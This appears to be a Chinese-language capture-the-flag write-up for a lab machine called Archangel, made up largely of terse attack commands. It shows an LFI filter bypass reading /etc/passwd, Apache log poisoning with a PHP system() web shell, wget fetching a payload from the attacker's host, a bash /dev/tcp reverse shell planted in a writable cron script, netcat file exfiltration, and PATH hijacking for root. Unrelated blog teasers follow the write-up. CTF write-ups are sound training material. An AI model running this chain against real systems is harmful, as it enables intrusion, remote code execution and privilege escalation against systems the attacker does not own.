起手式,扫 Port rustscan -a 10.10.163.60
扫路径 python3 dirsearch.py -u http://10.10.163.60/ -e all
观察网页首页,发现里面有 /flag
题目提示 : Find a different hostname
mafialive.thm
sudo vim /etc/hosts
10.10.163.60 mafialive.thm
再扫一次路径python3 dirsearch.py -u http://mafialive.thm/ -e all
http://mafialive.thm/robots.txt
/test.php
尝试 Base64 Payload
<!DOCTYPE HTML>
<html>
<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php
//FLAG: thm{explo1t1ng_lf1}
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
include $_GET['view'];
}else{
echo 'Sorry, Thats not allowed';
}
}
?>
</div>
</body>
thm{explo1t1ng_lf1}
../..
且一定要出现 /var/www/html/development_testing
../..
可以用 .././..
绕curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd
/var/log/apache2/access.log
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
nc 10.10.163.60 80
GET /?<?php phpinfo(); ?>
nc 10.10.163.60 80
GET /<?php system($_GET[A]); ?>
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=wget 10.13.21.55:8000/s -O /tmp/s
nc -vlk 7877
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=bash%20/tmp/s
python3 -c 'import pty; pty.spawn("/bin/bash")'
thm{lf1_t0_rc3_1s_tr1cky}
使用 Linpeas 扫
wget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh
archangel
来执行,而且我们对 /opt/helloworld.sh
有读写权限echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh
等待一分钟後,自动接上!!
thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}
观察使用者中的 secret 资料夹中
透过 nc 把档案传出来
nc -l -p 1234 > meow
nc 10.13.21.55 1234 < backup
哼!这种等级的 reverse,连 ida 都不用开,我们用 r2 就好ㄌ
r2 meow
aaa
s main
VV
fakepath
mkdir fakepath
export PATH=/home/archangel/fakepath:$PATH
echo '#!/bin/bash' > cp
echo "/bin/bash" >> cp
chmod +x cp
./backup
thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}
半夜的苹果发表会,想起了贾伯斯的那句“Stay Hungry. Stay Foolish” “Yo...
有兴趣的朋友可以点选以下连结,看到我这周撰写「系统分析师养成之路」的心得: https://itun...
Online threats, such as spyware, phishing and iden...
NextAuth + JWT authentication 虽然 Next.js 的定位是一个全端框...
终於来到最後一天了!!还记得这个教程的名字为「30 天 Java 从陌生到更陌生」吗? 为什麽会「更...